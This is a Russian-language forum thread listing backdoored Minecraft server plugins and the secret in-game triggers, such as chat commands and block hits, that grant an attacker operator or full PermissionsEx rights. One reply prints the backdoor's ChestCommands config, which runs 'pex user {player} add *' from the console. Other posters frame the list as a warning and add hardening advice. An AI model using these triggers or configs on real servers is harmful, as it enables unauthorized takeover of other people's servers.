Список плагинов с уязвимостями
  • NoName

    17 июня 2016 - 02:23
    Вы не авторизованы, войдите на сайт.
  • просмотров 16796 | ответов 9
Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью.
Способы получения админок очень разные и хитрые.
Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список:
1. aAntiSpam_v1.1 - способ взлома пока не известен.
2. Dupe - способ взлома пока не известен.
3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712
4. AntiBot - Берем рычаг в руки и нажимаем ПКМ.
5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин.
6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено).
7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю".
8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню.
9. BukkitApiEnhancer - Написать в чат /xhomexx (Не проверено).
  • NoName

    14 апреля 2017 - 19:58
Появился еще один плагин с уязвимостью RegisterFix
  • NoName

    14 апреля 2017 - 19:59
alex gamer сказал(а):
Появился еще один плагин с уязвимостью RegisterFix
Какой способ взлома? 
  • NoName

    14 апреля 2017 - 20:08
Сергей TU154 сказал(а):
Какой способ взлома? 
Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...
  • NoName

    14 апреля 2017 - 20:13
Сергей TU154 сказал(а):
Какой способ взлома? 
Нашел способ взлома!! Это переделанный ChestCommands только
menu-settings:   name: '&cВзлом опки.'   rows: 1   command:'register110011110' aa4:   COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *'   NAME: '&eВзлом админки'   LORE: - ''   ID: '264'   POSITION-X: 5   POSITION-Y: 1
  • NoName

    14 апреля 2017 - 20:18
Добавил в список.
  • NoName

    23 августа 2017 - 15:06
Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!
  • NoName

    14 марта 2018 - 20:32
Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
  • NoName

    14 марта 2018 - 21:33
Женя Жека228 сказал(а): Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.
  • Вова
    Вова
    27 мая 2019 - 09:37
alex,  Боже все норм у меня стоит плагин за щита от взлома опки и рех и все все команды проверил не работаеют у меня пишут нет таокй команды + я за претил всем писать команду help так как она иметь просомтр плагинов